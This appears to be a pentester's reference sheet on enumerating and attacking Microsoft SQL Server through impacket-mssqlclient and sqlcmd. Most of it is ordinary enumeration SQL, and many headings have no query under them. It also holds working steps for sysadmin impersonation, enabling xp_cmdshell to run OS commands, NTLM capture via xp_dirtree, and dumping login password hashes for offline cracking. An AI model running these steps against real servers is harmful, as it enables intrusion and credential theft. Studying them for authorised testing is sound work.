MSSQL

MSSQL (Microsoft SQL)

sqlcmd is Microsoft's command-line client for SQL Server. It runs T-SQL from the Windows command prompt on the database host itself, or remotely against another machine; from Linux, impacket-mssqlclient does the same job over the TDS protocol.

Way to connect to MSSQL from Kali with impacket (the sample password in the original line did not survive extraction, so the template form is shown):

impacket-mssqlclient {username}:{passwd}@{IP_addr} -windows-auth

breakdown:

{username}:{passwd}@{IP_addr}   e.g. Administrator:<password>@192.168.50.18
-windows-auth                   authenticate with Windows (NTLM) credentials instead of a SQL Server login; drop it for a native SQL login such as sa

check the version:

SELECT @@version;

When using a SQL Server command-line tool like sqlcmd, each statement ends with a semicolon and the batch is submitted with GO on a line of its own. GO is a sqlcmd batch separator, not a T-SQL statement, so when running queries remotely through impacket-mssqlclient it is omitted: the client sends each line you type as its own batch and GO is not part of the TDS protocol.

list of schema in database:

SELECT * FROM INFORMATION_SCHEMA.SCHEMATA;

list all available databases:

To get a list of tables

To get table column names:

To get all the values from the table:

breakdown

Below is an expanded set of notes and useful queries for MSSQL enumeration and usage, including commonly used views, functions, and procedures, as a more complete reference than the quick list above.


Connecting and Running Commands

Using sqlcmd Locally:

  • -S specifies the server name or IP (e.g., localhost or 192.168.50.18)

  • -U specifies the username

  • -P specifies the password

  • Within sqlcmd, end statements with a semicolon and use GO on a new line to execute. Example:

Using impacket-mssqlclient (Remote):

  • No need to use GO when running queries this way, as GO is a sqlcmd batch terminator and not part of the TDS protocol.
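To make the GO behaviour above concrete, here is an added example (not from the original notes) of a script saved as enum.sql and run with sqlcmd -S 192.168.50.18 -U <user> -P <password> -i enum.sql. Each GO closes a batch, and a variable declared in one batch is gone in the next; that scoping, not the semicolon, is what GO actually controls.

```sql
-- Added example, not part of the original notes. Run with:
--   sqlcmd -S 192.168.50.18 -U <user> -P <password> -i enum.sql
-- sqlcmd sends everything up to a GO to the server as one batch.

-- batch 1: declare a variable and use it
DECLARE @host sysname = @@SERVERNAME;
SELECT @host AS server_name, @@version AS version_string;
GO

-- batch 2: @host no longer exists. Uncommenting the next line fails with
-- "Must declare the scalar variable "@host"".
-- SELECT @host;
SELECT SUSER_NAME() AS login_name, DB_NAME() AS current_db;
GO

-- A batch may hold several statements; the semicolon ends a statement,
-- GO ends the batch. USE takes effect for the rest of the same batch.
USE master;
SELECT name FROM sys.databases ORDER BY database_id;
GO
```

For a one-off query, sqlcmd -S 192.168.50.18 -U <user> -P <password> -Q "SELECT @@version" runs the text as a single batch and exits, so no GO is needed there either. In impacket-mssqlclient every line typed at the SQL> prompt is its own batch, which is why multi-line constructs (DECLARE followed by a SELECT that uses the variable, IF ... BEGIN ... END, cursors) must be typed on one line there.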


Basic Information and System Details

Check the Server Version:

Check Current User / Login:

Check the Current Database:

List All Available Databases:

Every instance has the four system databases master, tempdb, model, and msdb; anything else in the list is a user database and is usually where the interesting data lives.

Switch to a Specific Database:


Enumerating Schemas, Tables, and Columns

List All Schemas in the Current Database:

List All Tables in the Current Database:

List All Tables in Another Database:

List All Columns for a Specific Table:

If you need to qualify with a specific database and schema:

Select All Data From a Table:
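The two sections above (basic information, then schemas, tables and columns) are one procedure in practice, so here is a single added example (not from the original notes) that collects the context in one query and then walks every database the current login can open, listing tables and columns from INFORMATION_SCHEMA. The table name in the final commented line is a hypothetical placeholder.

```sql
-- Added example, not part of the original notes. Built-in views only, so it
-- runs on any SQL Server 2008+ instance the current login can query.

-- Who and where are we?
SELECT @@version                    AS version_string,
       SUSER_NAME()                 AS login_name,   -- server-level login
       USER_NAME()                  AS db_user,      -- mapped user in the current DB
       DB_NAME()                    AS current_db,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;  -- 1 = yes, 0 = no

-- Databases, flagged by whether this login can actually open them.
SELECT name, database_id,
       HAS_DBACCESS(name) AS can_access,
       CASE WHEN name IN ('master','tempdb','model','msdb')
            THEN 'system' ELSE 'user' END AS kind
FROM sys.databases
ORDER BY database_id;

-- Tables and columns of every accessible user database, one result set per DB.
DECLARE @db sysname, @sql nvarchar(max);
DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.databases
    WHERE HAS_DBACCESS(name) = 1
      AND name NOT IN ('master','tempdb','model','msdb'); -- drop this line to include system DBs
OPEN dbs;
FETCH NEXT FROM dbs INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME keeps a database name with spaces or ] from breaking the query
    SET @sql = N'SELECT ' + QUOTENAME(@db, '''') + N' AS db, TABLE_SCHEMA, TABLE_NAME, '
             + N'COLUMN_NAME, DATA_TYPE FROM ' + QUOTENAME(@db)
             + N'.INFORMATION_SCHEMA.COLUMNS ORDER BY TABLE_SCHEMA, TABLE_NAME, ORDINAL_POSITION;';
    EXEC sp_executesql @sql;
    FETCH NEXT FROM dbs INTO @db;
END
CLOSE dbs; DEALLOCATE dbs;

-- Once a table looks interesting, pull rows with TOP so the output stays readable
-- (hypothetical names):
-- SELECT TOP 20 * FROM [shopdb].[dbo].[users];
```

The first two SELECTs work as typed in impacket-mssqlclient. The cursor block has to arrive at the server as one batch, so either feed the script to sqlcmd with -i or paste it onto a single line at the impacket SQL> prompt.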


Enumerating Users, Logins, and Roles

List All Server-Level Principals (Logins):

List All Database Users:

List All Roles in the Current Database:

Check Permissions of the Current User:
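As an added example (not from the original notes) covering the four items above in one pass: logins with their server roles, database users with their database roles, the current login's effective server permissions, and the check a pentester actually wants from this section, which other logins this login is allowed to impersonate. The 'sa' in the commented EXECUTE AS line is the default sysadmin login name and should be replaced with whatever the impersonation query returns.

```sql
-- Added example, not part of the original notes.

-- Server-level logins and their server-role membership (one row per role).
SELECT p.name AS login_name, p.type_desc, p.is_disabled, r.name AS server_role
FROM sys.server_principals p
LEFT JOIN sys.server_role_members m ON m.member_principal_id = p.principal_id
LEFT JOIN sys.server_principals   r ON r.principal_id = m.role_principal_id
WHERE p.type IN ('S','U','G')            -- SQL login, Windows user, Windows group
ORDER BY p.name;

-- Users in the current database and their database roles.
SELECT u.name AS db_user, u.type_desc, r.name AS db_role
FROM sys.database_principals u
LEFT JOIN sys.database_role_members m ON m.member_principal_id = u.principal_id
LEFT JOIN sys.database_principals   r ON r.principal_id = m.role_principal_id
WHERE u.type IN ('S','U','G')
  AND u.name NOT IN ('guest','INFORMATION_SCHEMA','sys')
ORDER BY u.name;

-- Effective server-level permissions of the current login.
SELECT permission_name FROM fn_my_permissions(NULL, 'SERVER') ORDER BY permission_name;

-- Logins that someone has been granted IMPERSONATE on. If the grantee is us (or a
-- role we hold) and the target is a sysadmin, EXECUTE AS is a direct escalation.
SELECT grantee.name AS grantee, target.name AS can_impersonate, target.is_disabled
FROM sys.server_permissions sp
JOIN sys.server_principals grantee ON grantee.principal_id = sp.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = sp.major_id
WHERE sp.permission_name = 'IMPERSONATE'
  AND sp.class_desc = 'SERVER_PRINCIPAL';

-- Try it, then REVERT drops back to the original login:
-- EXECUTE AS LOGIN = 'sa'; SELECT SUSER_NAME(), IS_SRVROLEMEMBER('sysadmin'); REVERT;
```

sys.server_principals and sys.server_permissions are readable by any login for its own rows; seeing every login's rows needs VIEW ANY DEFINITION or higher, so a short list can be a permissions artefact rather than a small instance.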


System Stored Procedures and Functions

Show All Databases (System Procedure):

Show Tables in the Current Database:

Get Detailed Info About a Specific Table:

Get Column Details for a Specific Table:

Find the Current Database Name (again, as a function):


Checking Active Connections and Sessions

View Current Sessions:

View Currently Running Queries:
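An added example (not from the original notes) for the two checks above: first the other sessions on the instance with where they come from and which client they use, then the statement each active request is executing, extracted from the batch text with the usual offset arithmetic.

```sql
-- Added example, not part of the original notes. These DMVs need VIEW SERVER
-- STATE to show sessions other than your own; an empty result means you lack
-- the permission, not that nobody else is connected.

-- Who else is connected, from where, with what client.
SELECT s.session_id, s.login_name, s.original_login_name,
       s.host_name, s.program_name, s.client_interface_name,
       c.client_net_address, s.login_time, s.status
FROM sys.dm_exec_sessions s
LEFT JOIN sys.dm_exec_connections c ON c.session_id = s.session_id
WHERE s.is_user_process = 1              -- skip background system tasks
  AND s.session_id <> @@SPID             -- skip ourselves
ORDER BY s.login_time;

-- What each active request is running right now (statement, not whole batch).
SELECT r.session_id, s.login_name, r.status, r.command,
       DB_NAME(r.database_id) AS db, r.start_time,
       SUBSTRING(t.text, (r.statement_start_offset / 2) + 1,
           ((CASE r.statement_end_offset
                 WHEN -1 THEN DATALENGTH(t.text)
                 ELSE r.statement_end_offset END
             - r.statement_start_offset) / 2) + 1) AS running_statement
FROM sys.dm_exec_requests r
JOIN sys.dm_exec_sessions s ON s.session_id = r.session_id
CROSS APPLY sys.dm_exec_sql_text(r.sql_handle) t
WHERE r.session_id <> @@SPID
ORDER BY r.start_time;
```

Application service accounts showing up in program_name and host_name are worth noting: they tell you which hosts hold credentials for this instance.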


Advanced Features

(Might Require Elevated Privileges)

Enable xp_cmdshell (disabled by default; turning it on needs ALTER SETTINGS, which in practice means the sysadmin role):

Use xp_cmdshell to Run OS Commands (If Enabled):

Directory Enumeration Using xp_dirtree:
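The three steps above as one added example (not from the original notes): check whether we can enable xp_cmdshell, enable it, confirm the setting, run a command with the output captured into a temp table so it can be queried, and fall back to xp_dirtree for directory listing. The C:\inetpub\wwwroot path is an assumed example target.

```sql
-- Added example, not part of the original notes. OS commands run as the SQL
-- Server service account (or the xp_cmdshell proxy account if one is set up).

-- Only a sysadmin (ALTER SETTINGS) can flip these; skip silently otherwise.
IF IS_SRVROLEMEMBER('sysadmin') = 1
BEGIN
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;           RECONFIGURE;
END

-- Confirm: value_in_use = 1 means enabled.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- Run a command and keep its output in a table instead of scrolling past it.
CREATE TABLE #out (line nvarchar(4000));
INSERT INTO #out EXEC xp_cmdshell 'whoami /all';
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;

-- xp_dirtree needs no xp_cmdshell and is callable by far more logins:
-- arguments are path, depth, and 1 to include files as well as directories.
-- A UNC path here (\\<host>\share) makes the service account authenticate
-- to that host over SMB, which is why it is also used for NTLM capture.
EXEC master..xp_dirtree 'C:\inetpub\wwwroot\', 1, 1;
```

In impacket-mssqlclient the IF ... END block must be typed on one line; recent impacket releases also ship the shortcuts enable_xp_cmdshell and xp_cmdshell <command> at the SQL> prompt, which issue the same sp_configure calls for you.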


Other Useful System Views

  • sys.syslogins is a SQL Server 2000 compatibility view that still works on current versions; it lists logins and exposes the password hash in its password column.

  • sys.sql_logins lists SQL-authenticated logins; its password_hash column is populated only when the caller holds CONTROL SERVER (sysadmin) and otherwise reads NULL.

  • sys.server_principals and sys.database_principals for detailed login and user info; join sys.server_role_members or sys.database_role_members to see role membership.
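An added example (not from the original notes) for the hash-bearing views above: dump the SQL logins with their hashes in hex, tag the hash generation from the leading version bytes, and verify a password guess on the server with PWDCOMPARE. The 'sa' login and the guess 'Password123' are placeholders.

```sql
-- Added example, not part of the original notes. password_hash comes back NULL
-- unless we hold CONTROL SERVER; NULL here is a permissions result, not an empty hash.
SELECT name, is_disabled, is_policy_checked,
       CONVERT(varchar(max), password_hash, 1) AS password_hash_hex,
       CASE LEFT(CONVERT(varchar(max), password_hash, 1), 6)
            WHEN '0x0200' THEN 'SHA-512 (SQL Server 2012+)'
            WHEN '0x0100' THEN 'SHA-1 (SQL Server 2005-2008)'
            ELSE 'unknown / not visible'
       END AS hash_type
FROM sys.sql_logins
ORDER BY name;

-- Check a guess against the stored hash without leaving the server.
-- Returns 1 on a match, 0 otherwise (placeholder login and guess).
DECLARE @hash varbinary(256) = (SELECT password_hash FROM sys.sql_logins WHERE name = 'sa');
SELECT PWDCOMPARE('Password123', @hash) AS matches_guess;
```

A 0x0200 hash is 2 version bytes, a 4-byte salt, then SHA-512 over the UTF-16LE password followed by the salt; the hex string copied out of password_hash_hex is what offline crackers expect (hashcat mode 1731 for 0x0200, 132 for 0x0100). In impacket-mssqlclient the DECLARE and the SELECT that uses @hash must go on the same line.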


Notes on Authentication and Connections

  • Integrated Authentication / Windows Auth: If you have a valid domain user that can connect with Windows auth:

    The -E flag tells sqlcmd to use a trusted connection, i.e. Windows authentication with the credentials of the user running sqlcmd, so no -U/-P is given. The impacket equivalent is the -windows-auth flag with the account supplied explicitly.

  • Port Changes: By default, SQL Server uses TCP port 1433. If the instance is listening on a different port, specify it as -S <server>,<port> (e.g., sqlcmd -S 192.168.50.18,1433). Named instances commonly sit on a dynamic port; the SQL Browser service on UDP 1434, when reachable, reports which port a given instance uses.
